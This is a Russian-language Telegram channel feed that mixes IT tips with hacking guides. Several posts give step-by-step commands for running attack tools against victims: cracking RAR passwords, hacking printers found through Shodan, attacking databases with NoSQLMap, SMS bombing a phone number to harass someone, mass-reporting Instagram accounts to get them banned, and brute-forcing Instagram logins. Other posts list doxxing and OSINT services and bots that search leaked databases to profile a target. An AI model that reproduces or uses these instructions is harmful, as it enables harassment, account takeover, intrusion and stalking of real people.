CMD | IT
25.6K subscribers
2.4K photos
596 videos
10 files
3.87K links
Новости IT, Безопасность в сети, Социальная инженерия.

Ссылка: @Portal_v_IT

Сотрудничество: @oleginc, @tatiana_inc

Купить рекламу: telega.in/c/cmd_it

РКН: clck.ru/3Jb78b
Download Telegram
​​Взлом пароля WinRAR

В данном посте пойдёт речь про неотъемлимую часть жизни - Запароленный Архив, который нужно срочно открыть. Но как? Легко!

Хочу уточнить, что данный метод подойдёт только для Архива, который был запакован максимум в 4 версии RAR'a. Из-за нововведения в 5 версии, фича работать не будет, т.к теперь стоит шифрование AES-256.

Инструкция:

1. Скачиваем программу Advanced Archive Password Recoverу
2. Устанавливаем ее > Открываем > переходим на вкладочку «Options» и устанавливаем русский язык.
3. Переходим на вкладку Длина и устанавливаем количество символов.
(по опыту скажу, лучше пробовать с 4 символов)
4. Далее выбираем тип атаки > выбираем набор символов.
5. Открываем в программе архив, к которому нужно подобрать пароль и ждем.

Готово! Пароль от архива взломан.
​​​​​Проверяем сайт на наличие вирусов

Полагаю, при поиске нужных файлов, документов или фильмов, многие сталкивались с ситуацией, когда, казалось бы, нужный материал обнаружен, но вот сайт не вызывает доверия: домен странный, название - хаотичный набор букв, а описание и вовсе состоит из непонятных иероглифов.

При переходе на подобный сомнительный сайт, пользователь рискует заразиться, особенно при отсутствии надежной антивирусной защиты. Так как же быть?

Safeweb — сервис, который проверит сайт на наличие вирусов. Для этого введите адрес веб-сайта, который хотите проверить и через несколько секунд вы получите отчет о находящихся на нем угрозах, если они имеются. Помимо этого, вы можете почитать отзывы о безопасности интересующего вас сайта и посмотреть его рейтинг.
​​Симуляция Linux в браузере

Энтузиасты использовали HTML, CSS и JavaScript. Итоговый результат выглядит очень натуралистично, хоть и не без недостатков. На GitHub появился проект, в котором Linux попытались симулировать при помощи JavaScript и CSS. Получилось очень правдоподобно, но не без упущений.

Называется симуляция операционной системы в браузере — "linuxWeb". Доступна она в одноимённом GitHub-репозитории пользователя под ником Manthee1. При этом, в отличие от многих своих коллег, разработчик не стал расписывать в readme-файле процесс создания проекта.

При попадании на сервис, сначала вы увидите просьбу нажать любую клавишу, после чего начнётся процесс загрузки «операционной системы». Затем вам предложат ввести пароль (123). Попав на рабочий стол системы, пользователи того же Ubuntu почувствуют себя как дома.
​​Как взломать принтер с помощью Termux

Вы когда-нибудь задумывались, зачем хакеры проводят атаки на принтеры? Дело в том, что принтеры могут раскрыть гораздо больше информации, чем кажется. Целью атаки может быть память NVRAM устройства, в котором могут находиться данные для входа (пароль).

Кроме того, таким образом можно получить доступ к файловой системе, в которой находятся файлы конфигурации и данные аутентификации аккаунтов. Это лишь основные причины взлома таких информационных носителей, но на самом деле их гораздо больше.

Установка:

▫️git clone https://github.com/RUB-NDS/PRET
▫️cd PRET

▫️pip install colorama pysnmP

Использование:

Теперь переходим на сайт Shodan и в строке поиска вводим запрос:
▫️port:9100 pjl

Выбираем нужный нам IP принтера, переходим обратно в терминал и прописываем:
▫️python2 pret.py (ip адрес жертвы) pjl
​​Как ломать БД на сайтах?

В данном посте пойдёт речь про утилиту NoSQLMap. Это достаточно простой инструмент, написанный на языке программирования Python, имеющий полностью открытый код и любой желающий может взглянуть на него изнутри.

Для корректной работы программы необходим предустановленный Metasploit.

Установка:

▫️git clone https://github.com/codingo/NoSQLMap.git
▫️cd NoSQLMap
▫️python setup.py install

Использование:

▫️python nosqlmap.py

Далее всё предельно просто.
​​Проводим поиск человека по его Никнейму

В данном посте хочу в очередной раз затронуть тему поиска человека в интернете. На этот раз поиск по никнейму.

Spokeo - проводит поиск по имени, нику, телефонному номеру и адресу.

Namecheckup - проверяет занятость никнейма на сайтах, в приложениях и доменах.

Social-searcher - поможет найти практически все упоминания слов или никнейма в социальных сетях и на различных новостных сайтах.

Thatsthem - проводит полный поиск людей по имени, адресу, номеру телефона, адресу электронной почты, IP-адресу или VIN.

Leakedsource - Дает пользователю возможность осуществлять поиск по нику, номеру, паролю, IP адресу и электронной почте.

Usersearch - помогает сузить поиск до определенных категорий. Например, только до крипто форумам, сайтам знакомств или различных социальных сетей.
​​Как пробить страницу в ВК?

В данном посте собраны самые лучшие для работы с этой соц.сетью, которыми пользуются профессионалы в сфере OSINT-Разведки.

1. Узнать ID страницы — этот уникальный идентификатор пригодится вам в дальнейшем.

2. InfoApp — генерирует ссылки на новостную ленту цели, ее упоминания, собирает комментарии от лица цели, сортирует записи со стены по типам.

3. Тут Найдут — архив страниц ВК, может найтись реальная фамилия, дата рождения, информация об уже удаленной странице.

4. Поиск друзей закрытого аккаунта — после перехода по ссылке нужно будет заменить XXX на ID искомой страницы.

5. 220vk.com — Огромный комбайн для работы с ВК, от поиска закрытых друзей до мониторинга активности.
👍2
Как отключить всю рекламу на смартфоне

Нынешний интернет-серфинг сложно представить без назойливой рекламы, ведь ее присутствие встречается буквально всюду. И что самое неприятное, помимо причинения эстетического дискомфорта, она безжалостно истощает ресурсы системы и драгоценного интернет трафика.

Положительная новость заключается в том, что блокировать большую часть рекламы можно и без установки дополнительных приложений. Для этого нужно перейти в настройки устройства, найти пункт «Частный DNS» и вписать туда dns.AdGuard.com.

После чего включится фильтрация трафика, которая будет блокировать нежелательный контент и вспомогательно защищать личные данные. Стоит отметить, что данный способ работает только на Android-устройствах, чья версия операционной системы не ниже 9-й. Инструкции для других устройств можно найти здесь.

#полезно
1👍1
​​Устраиваем мощнейшую СМС-Атаку

В данном посте будет рассмотрен способ организации мощной SMS-атаки на любой номер телефона. Подобную атаку можно спокойно использовать чтобы насолить своему неприятелю и вывести его из себя.

Приступим:

1. Обновляем нужные пакеты:
- apt update & apt upgrade -y

2. Устанавливаем пакет "Git"
- pkg install git

3. Устанавливаем репозиторий Github:
- git clone https://github.com/Argisht44/android.git

4. Далее просто прописывайте команды по очереди:
- cd android
- cd Infinite-Bomber-arm64
- chmod 777 infinite-bomber

5. Запустите утилиту:
- ./infinite-bomber

Сразу после запуска, вам предложит ввести и номер, как только вы введёте, атака начнётся.
​​Боты для пробива в Telegram

В данном посте пойдёт речь про ботов в Telegram, позволяющих провести пробив и узнать практически всю нужную информацию про вашу жертву.

Боты не гарантируют вам полной информации, но в OSINT может пригодится каждый байт данных.

1. @bmi_np_bot - позволяет определить страну, регион и оператора имея всего-лишь номер телефона.

2. @getfb_bot - выдаёт по номеру телефона страницу в Facebook.

3. @get_kontakt_bot - показывает, как номер указан в контактах.

4. @GetPhone_bot - пробивает номер телефона по открытым базам данных.

5. @imole_bot - пробивает по слитымы базам данных номер телефона.
1
​​Сервисы для пробива по фото

В данном посте пойдёт речь про специализированные сервисы для пробива по фото. Подборка достаточно большая, в ней собраны практически всевозможные сайты для проведения и упрощения OSINT разведки.

Фото:
1. azure.microsoft.com — соотнесение лиц, определит вероятность того, что на двух разных изображениях изображен один и тот же человек, и выдаст оценку достоверности

2. findclone.ru — поиск по базе из VK

3. pimeyes.com — индексирует фото с сайтов, не точен, ограниченные возможности

4. search4faces.com — поиск по базам лиц VK и OK

5. metapicz.com — покажет EXIF
stolencamerafinder.com — определит EXIF и по этим данным найдет какие еще фото были сделаны этим устройством

6. exif.regex.info — извлекает META-данные

7. cameratrace.com — определит EXIF и по этим данным найдет какие еще фото были сделаны этим устройством

8. get-metadata.com — извлекает META-данные

9. 29a.ch — фото-форензика, анализ изображения на изменения

10. stylesuxx.github.io — декодирует скрытое сообщение в изображении

Для файла формата PDF:

1. exif.regex.info — извлекает META-данные
2. www.get-metadata.com — извлекает META-данные
👍2
​​Компьютерная разведка

В данном посте поговорим о сервисах и ути­литах, которые созданы для ана­лиза таких дан­ных, как IP, SSID, метадан­ные фай­лов, DNS-записи, и все­го, где объ­ектом ана­лиза выс­тупа­ет эле­мент IT-струк­туры, будь то сайт или IP-адрес.

1. Urlscan.io — про­веря­ет, кому выдан TLS-сер­тификат и какие IP-адре­са свя­заны с сай­том.

2. PDFCandy — сервис дает тебе воз­можность извле­кать и изме­нять метадан­ные PDF.

3. PublicWWW — сервис ищет инфу по исходно­му коду стра­ниц. Находит ник­ней­мы, упо­мина­ния в коде, сопос­тавля­ет знач­ки сай­тов, что поз­воля­ет искать двой­ники.

4. Metadata2Go — поможет узнать все метадан­ные фай­ла.

5. Knock Subdomain Scan— переби­рает суб­домены на целевом домене и может генери­ровать выход­ной файл сhttps://github.com/guelfoweb/knock резуль­татами.
​​Воскресная подборка: программы которые прокачают ваш ПК

В данной воскресной подборке пойдёт речь про специализированные программы способные "прокачать" ваш ПК, а именно добавить какие-то новые функции, ускорить работу и так далее.

Unchecky - автоматически снимает галочки напротив разрешений на установку дополнительных и скрытых сервисов при установке программ.

TeraCopy - заменяет стандартное окно копирования файлов, предоставляя куда больше информации об этом процессе добавляя к нему дополнительный функционал.

Moo0 System Monitor - маленький и легкий виджет для рабочего стола, который показывает абсолютно всю информацию о происходящих процессах и состоянии компьютера в режиме реального времени.

Fences - позволяет быстро и удобно сортировать и группировать файлы, папки и ярлыки рабочего стола в аккуратные таблички, которые можно гибко настраивать.

Light Bulb - автоматически меняет яркость и оттенок экрана в зависимости от времени суток.
Вам нравится наша новая рубрика "Воскресная подборка"?
Anonymous Poll
89%
Топ бро! 💪🏻
11%
Нет, не очень! ✖️
Современный учебник JavaScript

learn.javascript.ru — учебник по JavaScript, начиная с основ, включающий в себя много тонкостей и фишек JavaScript/DOM. Вы можете изучить JavaScript, начиная с нуля и заканчивая продвинутыми концепциями вроде ООП.
​​Декодируем любые шифры с помощью hURL

hURL — Небольшая утилита, которая может кодировать и декодировать между огромным количеством различных шифров.

Установка:
$ git clone https://github.com/fnord0/hURL
$ cd hURL

Использование:
$ ./hURL -b "S2FsaSBMaW51eAo="

Вывод:
Original string :: S2FsaSBMaW51eAo=
base64 DEcoded string :: Kali Linux


Вся информация предоставлена исключительно с целью ознакомления. Мы не несём ответственности за ваши действия.
👍1
​​Проверка граждан РФ

В данном посте представленна подборка из очень полезных сайтов, которые подскажут вам очень много интересной информации про интересующего вас человека.

1.Международный розыск: https://www.interpol.int/notice/search/wanted

2. Список террористов: http://fedsfm.ru/documents/terrorists-catalog-portal-act

3. Федеральный розыск:
https://mvd.ru/wanted

4. Розыск сбежавших заключенных:
http://fsin.su/criminal/

5. Розыск ФССП:
http://fssprus.ru/iss/ip_search\

6. Действительность паспорта:
http://сервисы.гувм.мвд.рф/info-service.htm?sid=2000

7. Проверка ИНН:
https://service.nalog.ru/inn.do

8. Кредиты:
https://app.exbico.ru/

9. Исполнительные производства:
http://fssprus.ru/iss/ip

10. Налоговые задолженности:
https://peney.net/

11. Залоги имущества:
https://www.reestr-zalogov.ru/state/index#

12. Банкротство:
https://bankrot.fedresurs.ru/

13. Участие в судопроизводстве: https://bsr.sudrf.ru/bigs/portal.html

14. Решения мировых судей СПб:
https://mirsud.spb.ru/

15. Участие в бизнесе:
https://zachestnyibiznes.ru/
https://ogrn.site/
​​Баним чужие аккаунты в Instagram

Данный инструмент позволит вам автоматически отправлять множество жалоб на чужие аккаунты в различных социальных сетях с целью их блокировки.

Установка:

▫️ git clone https://github.com/mrwn007/007spam-BOT.git

▫️ cd 007spam-BOT

▫️ python3 -m pip install requests

Использование:

▫️ python3 bot.py

Данный бот активно спамит жалобами, что позволяет убрать любой контент жертвы, а в конечном итоге, и ее аккаунт.
👍1
​​Как взломать аккаунт в Instagram?📙

Разработчики любых сервисов, сайтов и приложений имеют свойство ошибаться, и Instagram не является исключением. Ошибка, которую допустили при обновлении социальной сети, привела к разгулу хакеров и краже аккаунтов. Теперь проводить BruteForce атаки можно совершенно легко и эффективно.

Чтобы осуществить данную атаку, не нужно быть Кевином Митником - достаточно установить утилиту Instashell и следовать инструкции ниже.

Установка:
◽️git clone https://github.com/tiptoettt/instashell
◽️cd instashell
◽️chmod +x instashell.sh

Использование:
◽️service tor start
◽️./instashell.sh

После запуска программы, вам предложит ввести имя профиля жертвы в Instagram и путь к словарю паролей. Если пароль будет подобран, то утилита выдаст вам нужный.

⛔️Информация предоставлена с целью ознакомления.
👍2
Как вернуть ваш ПК к жизни, если он завис?

Если вы переоцениваете возможности вашего железа и вам свойственно нагружать его по полной программе, то зависания являются для вас не такой уж и редкой проблемой. С данной проблемой можно справиться с помощью специальных сочетаний клавиш.

1. «Esc» - Данная клавиша ответственна за отмену последнего действия и выхода из открытого приложения.

2. «Alt+F4» - Данная комбинация применяется для восстановления работы операционной системы, которая зависла по неустановленной причине.

3. «Ctrl+Alt+Del» - Эта комбинация применяется для перезагрузки компьютера с первых версий Windows.

Подобные сочетания очень полезная фича, но лучше изначально не допускать ситуаций с зависаниями и произвести профилактику.
​​​​Подборка сервисов временной почты📥

Как часто вам приходится вводить свою почту для регистрации? Около 90% людей при регистрации где-либо пишут свою настоящую почту, чем и "убивают" свою анонимность. В этой подборке мы и будем обходить такие случаи, с помощью бесплатных сервисов.

1. crazymailing.com - сервис временной почты для борьбы со спамом.

2. temp-mail.org - временная одноразовая почта.

3. dropmail.me - бесплатный анонимный временный адрес электронной почты.

4. my10minutemail.com - сервис временной анонимной электронной почты (tempmail).

5. 10minemail.com - временная почта на 10 минут.

6. mohmal.com - бесплатный анонимный временный адрес электронной почты.

7. emailondeck.com - сервис временной почты для борьбы со спамом.

8. 10minutemail.net - временная почта на десять минут.

9. tempail.com - бесплатный анонимный временный адрес электронной почты.